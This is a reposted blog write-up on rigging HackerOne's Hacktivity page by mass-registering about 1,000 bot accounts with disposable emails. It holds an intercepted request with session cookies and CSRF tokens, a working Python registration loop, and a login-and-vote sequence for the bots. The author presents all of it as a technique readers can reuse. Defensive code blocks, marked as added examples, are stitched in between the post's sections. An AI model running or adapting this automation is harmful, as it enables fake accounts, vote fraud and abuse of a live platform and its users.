Security and Technology

How I owned the HackerOne Hacktivity page – Learn Penetration Testing & Ethical Hacking

Automation is one of the best ways to perform some undesired actions against, or penetration-test, a web application; it is very pleasant to relax and watch a bot act on your behalf. This article will show you how to perform automation by explaining the one performed on HackerOne at the beginning of September.

Using this will allow you to:
– Make your own report the most public one.
– Get the badge of most popular report on the feeds.

Hi,
To those who know and those who do not: I think there is no one who does not love automation. I will talk about it and explain in detail how I controlled the Hacktivity page on HackerOne and set OLX reports to be the most popular, with the highest number of votes, using 1k bots.

What is automation?
First, what comes to your mind when you hear "manually"? It means done by human hands, right!
So automation is these same actions made by something other than humans: bots, robots, computers or zombies.
According to Wikipedia, automation is the use of various control systems for operating equipment such as machinery, processes in factories, boilers and heat treating ovens, switching on telephone networks, steering and stabilization of ships, aircraft and other applications with minimal or reduced human intervention. Some processes have been completely automated.

We will focus on our main point: automation on web services.

Dependencies
So if you want to automate a web application, what does that depend on?
The main factor in automating a web application is rate limiting: if a website does not implement a rate limit, you can automate it easily. There are other factors, but they can be bypassed.
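The dependency described above is exactly what a defender removes. The following is an added example, not code from the original post or from HackerOne: a sliding-window rate limiter keyed by request source, with an injectable clock so the behaviour can be checked without sleeping. The class and helper names, the 5-per-60-seconds budget and the 203.0.113.0/24 test addresses are all assumptions made for this illustration.

```python
import time
from collections import deque


class RegistrationRateLimiter:
    """Sliding-window limiter keyed by request source (e.g. client IP).

    Hypothetical helper: it admits at most `limit` attempts per `window`
    seconds from one source. The clock is injectable so tests can run
    without sleeping.
    """

    def __init__(self, limit=5, window=60.0, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock
        self._hits = {}  # source -> deque of attempt timestamps, oldest first

    def allow(self, source):
        now = self.clock()
        q = self._hits.setdefault(source, deque())
        # Forget attempts that have fallen out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            # Over budget: answer 429, log the source, do not create the account.
            return False
        q.append(now)
        return True


class FakeClock:
    """Deterministic clock used only for the demonstration below."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate_burst(limiter, clock, source, attempts, interval):
    """Send `attempts` registrations `interval` seconds apart; return how many were admitted."""
    admitted = 0
    for _ in range(attempts):
        if limiter.allow(source):
            admitted += 1
        clock.advance(interval)
    return admitted


if __name__ == "__main__":
    clock = FakeClock()
    limiter = RegistrationRateLimiter(limit=5, window=60.0, clock=clock)
    # An intruder-style burst of 5 requests per second from one address
    # gets only the first 5 through; the remaining 95 are refused.
    print("admitted from burst:", simulate_burst(limiter, clock, "203.0.113.7", 100, 0.2))
```

A per-source budget is one layer only: it caps what a single connection can do per window, but it must be combined with identity checks (email canonicalisation, activation) because a distributed source set can spread attempts across addresses.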

Requirements

– An understanding of how the target works.
– Specify the action you want to make.
– A technique to use for making the undesired actions.
– Bypass obstacles like CSRF, session and rate limit, if they exist.
– Some bots (optional, depends on the target and the action required).
– An automation tool, or programming knowledge.

HackerOne

Let's get into our example. HackerOne is the most popular bug bounty platform; I scanned their website, and I admit I could not find anything interesting, so I decided to play with their system and I found many weaknesses by chance.

Earlier, I had requested to disclose a bug that was resolved by OLX; they accepted to publicly disclose it, and I decided to make it the most popular, so I began investigating what I needed to do that.
Understanding how HackerOne works
1- I scanned HackerOne many times and found nothing; they are protected against common issues like XSS, SQLi and RCE. On 25 August I discovered HackerOne was already protected against CSRF, but fortunately their tokens are not 100% secure: they considered their users, but did not consider their system.

What do I need and what should I do?
My main goal is to increase the votes on a certain report. Their Hacktivity page has two tabs: the main one is popular reports and the second is for the newest reports.
I need more accounts to vote; it is hard if not impossible to do manually. I started to create a new account, intercepted the request, and found that it could be used to create an unlimited number of accounts.

Technique
We need about 500 IDs because the most popular report on HackerOne is the RCE found on Pornhub with 280 votes, so we just need 282; but HackerOne considers other factors like date of disclosure and bounty, so I decided that 1K is good enough. Then we need to make these bots vote on the required report, so I need to understand the login process and the POST request submissions for making a real action, in order to program my bots to perform the same processes.

Bypassing obstacles
HackerOne does not prevent users from multiple registrations; anyone can own a huge number of registered accounts.
No rate limit was enforced by HackerOne, so this will not stop us.

Creating bots
HackerOne allows any email address in the registration process; this helped me use disposable mail like YOPmail. My friend Saed Hashem suggested using email aliases: that means you can use xy@gmail.com to register the first account and then add a single dot or a plus to the email, and HackerOne will consider it a different email, so you can register a new account with the same mailbox by using a dot or plus alias. Anyway, I used YOPmail and I have my reasons.
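The alias trick works only when the service treats every spelling of an address as a distinct identity. As an added example (not code from the original post or from HackerOne), the following canonicalises addresses before the uniqueness check and refuses a constructed list of disposable domains. The function names, the domain lists and the policy of stripping plus-tags for every domain are assumptions of this example; Gmail's disregard of dots in the local part and the googlemail.com alias are documented provider behaviour.

```python
# Constructed lists for this example; a production deployment would use a maintained feed.
DISPOSABLE_DOMAINS = {"yopmail.com"}               # the provider the post used
DOT_INSENSITIVE_DOMAINS = {"gmail.com"}            # Gmail ignores dots in the local part
DOMAIN_ALIASES = {"googlemail.com": "gmail.com"}   # same mailbox reachable under another domain


def canonical_email(address):
    """Collapse alias spellings of one mailbox to a single identity.

    Plus-tags ("user+anything@...") are stripped for every domain (a policy
    assumption of this example); dots are stripped only for providers known
    to ignore them.
    """
    addr = address.strip().lower()
    if addr.count("@") != 1:
        raise ValueError("not a single-@ address: %r" % address)
    local, domain = addr.split("@")
    local = local.split("+", 1)[0]
    domain = DOMAIN_ALIASES.get(domain, domain)
    if domain in DOT_INSENSITIVE_DOMAINS:
        local = local.replace(".", "")
    if not local:
        raise ValueError("empty local part after canonicalisation: %r" % address)
    return local + "@" + domain


def is_disposable(address):
    """True when the canonical domain is on the constructed disposable list."""
    return canonical_email(address).split("@")[1] in DISPOSABLE_DOMAINS


def assess_registration(address, existing_canonicals):
    """Decide on a sign-up attempt; returns (decision, canonical_form).

    `existing_canonicals` is the set of canonical addresses already registered
    and is updated when the attempt is accepted.
    """
    canon = canonical_email(address)
    if canon.split("@")[1] in DISPOSABLE_DOMAINS:
        return "reject-disposable", canon
    if canon in existing_canonicals:
        return "reject-duplicate", canon
    existing_canonicals.add(canon)
    return "accept", canon


if __name__ == "__main__":
    seen = set()
    for attempt in ["xy@gmail.com", "x.y@gmail.com", "xy+2@gmail.com", "bot1@yopmail.com"]:
        print(attempt, "->", assess_registration(attempt, seen))
```

Store the canonical form alongside the address the user typed: the uniqueness index and the activation mail both key on the canonical value, while mail is still delivered to the original spelling.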

Start attack
Once you have understood the target and how it works, specified an action, created some bots and prepared your tool, you can start the attack.

Let's begin

The first step I made was to create the bots. I must tell you this was a mistake, because you might spend hours and strain your connection creating bots manually or automatically, and then find that real actions are limited and cannot be automated. Fortunately I was lucky: there were no limits and my attack was possible.

I navigated to the registration page on HackerOne, filled in my details, submitted the form and intercepted the request.

____________________________________________________________________

POST /users HTTP/1.1
Host: hackerone.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: oueE yECJPxFdAPJA8d70WvAfz0NoITWJ/RlQN Sg2sZBkKpnvDLtf8rIaTq09DTAOBHNxB61sHFWnVQ/ruenQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ift.tt/17NzeQt
Content-Length: 189
Cookie: __cfduid=d7742669d928f93669b15d43eac71c1f71473642918; __Host-session=NDlwM2FPZmp3aCtJbVJ3Vy9zK3VmQUVodGt6VStuTXVodk80WjVmMFlPV2FUS3RpL3cxRVFTT0VlVzdYMERWaVE2MENwdHkvbW8vT0JwNjZoeUYzYkEyUHFPU0g4ZDdINjBWdU9RQ1pYY1V4RlB2MzVjVWRsWVRYSXloSXFmdHhQVUtYeU9od0hhTFF6NGMvek5UR3p2aFZqVldEZ0dDRkFqMzRkeWxpT0lkODYyS0Y0Rk5RbkpsNVExcXhyVEFzLS1WWWZhenJKbldVNjh3RmpkMjdHenVBPT0=–ebbc2bea1b093f0d24bff6f257b7ce5a38460f44; _ga=GA1.2.1002285040.1473642950; _gat=1
Connection: close

user[name]=thisismyname&user[username]=thisisusernamex&user[email]=thisisemail@yopmail.com&user[password]=123qwe!@#QWE&user[password_confirmation]=123qwe!@#QWE

_________________________________________________________

And the response was

____________________________________________________________________

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2016 01:22:01 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 46
Set-Cookie: __Host-session=blah
Connection: close

{"redirect_path":"/users/sign_in","errors":{}}

____________________________________________________________________

Now we have created an account with username=thisismynamexx and email=thisisemailx@yopmail.com.
So to create a new account, you have to change the username and email, regardless of the other parameters. I did it immediately and it was accepted.
It is very cool: you can set up Burp Intruder, tell it to change the username and email, and make more than 5 IDs/sec. Let's do it:

We got a problem: an internal server error occurred. This is not a rate limit; it is due to too many requests at the same time, like a race condition. We should sleep a little after each request. It is not a big problem, but we cannot handle it using Burp, so let's do it using Python.

____________________________________________________________________

import requests, time
requests.packages.urllib3.disable_warnings()

# All headers captured from the intercepted registration request.
_headers_ = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:47.0) Gecko/20100101 Firefox/47.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "X-CSRF-Token": "JSFMAnHPA7fm7d3cQWtmU220kwibz1Ojc/74HYpYx8WJDa/tabBr9JpaeJQJtrc/z3UmTEBO354TZWvyhDuCVA==",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": "http://ift.tt/17NzeQt",
    "Cookie": "__cfduid=d1cdfc0b504bd870dc94c5509a2f41bd71472917466; _ga=GA1.2.1635264352.1472917475; __Host-session=anhEcDkzOVVwYWxDL2pVSTJ3NTZWeHFVUzhTTzVHbDNzK1lQUWl3eG53Q0xyNHdLY3Y5aHJsQnl4VUNtSjI4OWx6bFozRDZDcFBRQVlXdjBsMXpaUEFNR3ZpTFV6c1NVU2s0TnBvMFhVZTAxWEVyUXVQT2FDSExUNjFZQW16UG1IWWlxaE9Zd0h1SFNmKytFWW52eG81N0xqWTh1QW16bS9leThwME1sQXllWE00bHJCN2NqNTlMN3pWckN2eXFULS1qcFJoTW1SSVF6VkVVQXllT1QwUy93PT0%3D–94bd223fffd82f1c61b2d03cc2f0be5ac1f3b93a; _gat=1",
}

_url_ = 'http://ift.tt/2f8b9zx'
# Response body returned when a registration succeeds.
okbody = '{"redirect_path":"/users/sign_in","errors":{}}'
# now we have the headers

for i in range(0, 1000):
    username = 'mrexceptionxbot' + str(i)
    pas = '123qwe!@#QWE'
    _data_ = "user[name]=Egy+Bots&user[username]=" + username + "&user[email]=" + username + "%40yopmail.com&user[password]=" + pas + "&user[password_confirmation]=" + pas
    isregistered = False
    # Retry the same username until the server confirms the registration.
    while isregistered == False:
        r = requests.post(url=_url_, data=_data_, headers=_headers_)
        if okbody in r.text:
            isregistered = True
            print('success ' + username)
        else:
            time.sleep(5)
    # Pause between accounts to avoid the internal server errors seen with Burp.
    time.sleep(2)

____________________________________________________________________
Let's explain the code:
1- We import the requests module, an amazing module for HTTP.
2- Disable warnings.
3- We collected all the headers in a dictionary.
4- The URL we used for registering.
5- If registration succeeded, the response body will contain this value.
6- Begin the loop to create 1000 accounts.
7- Build the username we will use; on every iteration i increases and changes the username. pas is the password.
8- Data is the request body we will send in the request; the email is built as username@yopmail.com.
9- This variable helps to retry if a registration failed once, and makes sure all i values are used and all IDs are registered successfully.
10- Start the loop that makes sure the registration succeeded.
11- Send the request.
12- Check if the response body contains the "successful registration" message.
13- If registration succeeded it continues with the next account; if it failed it waits 5 seconds and retries with the same username.
14- When registration succeeded it waits 2 seconds to prevent internal server errors from occurring.
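Seen from the other side, the loop above leaves a very regular trace: one source address, one disposable domain, usernames that differ only by a trailing counter, and a steady cadence of successful POST /users calls. The following is an added example, not code from the original post or from HackerOne: it parses constructed registration log lines in a hypothetical format, flags any source that completes a threshold of registrations inside a sliding window, and flags families of usernames that share a stem with numeric suffixes. The log format, the 203.0.113.0/24 and 198.51.100.0/24 addresses and the thresholds are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in a hypothetical format (not a real HackerOne log):
# "<ISO timestamp> <client ip> POST /users <status> user=<name> email=<addr>"
def make_sample_log():
    base = datetime(2016, 9, 12, 1, 22, 1)
    lines = []
    # Twelve bot-style registrations from one address, 2 s apart, sequential names.
    for i in range(12):
        ts = (base + timedelta(seconds=2 * i)).strftime("%Y-%m-%dT%H:%M:%SZ")
        name = "mrexceptionxbot%d" % i
        lines.append("%s 203.0.113.7 POST /users 200 user=%s email=%s@yopmail.com" % (ts, name, name))
    # Two ordinary sign-ups from other addresses.
    lines.append("2016-09-12T01:20:30Z 198.51.100.5 POST /users 200 user=alice email=alice@example.org")
    lines.append("2016-09-12T01:25:11Z 198.51.100.9 POST /users 200 user=bob_k email=bob@example.net")
    return lines


LINE_RE = re.compile(r"^(\S+) (\S+) POST /users (\d{3}) user=(\S+) email=(\S+)$")


def parse_line(line):
    """Turn one log line into an event dict, or None if it is not a registration."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, status, user, email = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
            "status": int(status), "user": user, "email": email}


def burst_sources(events, window_seconds=60, threshold=5):
    """Sources whose successful registrations in some sliding window reach the threshold.

    Returns {ip: peak count in any window}.
    """
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == 200:
            by_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        best, start = 0, 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() >= window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


SEQ_RE = re.compile(r"^(.*?\D)(\d+)$")  # a stem followed by a numeric suffix


def sequential_stems(events, min_count=5):
    """Username stems that appear with at least `min_count` distinct numeric suffixes."""
    names = defaultdict(set)
    for e in events:
        m = SEQ_RE.match(e["user"])
        if m:
            names[m.group(1)].add(e["user"])
    return {stem: len(s) for stem, s in names.items() if len(s) >= min_count}


def analyze(lines):
    """Run both detectors over raw log lines and return their findings."""
    events = [e for e in map(parse_line, lines) if e]
    return {"burst_sources": burst_sources(events), "sequential_stems": sequential_stems(events)}


if __name__ == "__main__":
    print(analyze(make_sample_log()))
```

The two signals are independent on purpose: the burst detector catches volume from one source even when usernames are random, and the stem detector catches a scripted naming scheme even when requests are spread over many addresses or slowed below the rate threshold.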

It is ok. Now we have registered the bots, but HackerOne asks for activation, so we need to go to YOPmail and start clicking all the links associated with each account we registered.

I had already created more than 1200 IDs and activated all of them. I did not try to automate this process because YOPmail implements a security captcha; even when I used it manually I was blocked for some time, but with a little research I found it could be automated.

You have your army now: you created your bots and activated them. Let's kill some.

Before launching the bots, we need to program them to do some undesired actions, so you need to understand how HackerOne works: we need to simulate the login process first and discover how a real action is made.

The first thing is to clear all your cookies, start the login, do some actions and watch what is happening and how it is done.

First I requested the login page, then filled in my credentials and submitted the request; HackerOne logged me in and redirected me to the Hacktivity page, and I finally voted for a random report.
You see many requests; we only care about the login requests and the voting request.

Most of these requests are not valuable; we need the most interesting ones to ask the bots to do the same. After reviewing the requests, I kept these:

I cleared my cookies many times and retried the same process; every time I failed by deleting one of these 6 requests, so all of them are required except the last one, which is the real action. You can replace it with any other action since it uses the CSRF token.

By analyzing these requests from the last to the first, I discovered the following:

1- The last action, "Voting", is made using the CSRF token sent in the response to request 4 and the session cookie value sent in response to request 5.
2- Request 5 asks HackerOne to send a valid CSRF token for the real action, using the session cookie value sent in response to request 4.
3- Request 4 initialises the session, using the cookie sent in response to request 3.
4- Request 3 checks whether the user credentials are valid or not, using the cookies sent in response to request 2.
5- Request 2 asks HackerOne to start the login process, using the first cookies.
6- Request 1 is made with no cookies, specifically to get the first cookies from HackerOne.

So our scenario for the bots:
1- We send an empty request to ask HackerOne for some cookies [GET].
2- Using these cookies, we request the login process [GET].
3- Send the bot username and password with the cookie sent in stage 2 [POST].
4- Resend the username and password with the cookie sent in stage 3 [POST].
5- Ask HackerOne for the real-action CSRF token [GET] with the cookie sent in stage 4.
6- Using the CSRF token and the last cookies sent, perform any real action, like voting or submitting random reports.

We have the bots now, and we have the scenario:

The post How To owne Hackerone Hacktivity page and earn new badge [NotFixed] appeared first on Learn Penetration Testing & Ethical Hacking. http://ift.tt/2dLdWZI http://ift.tt/2aM8QhC
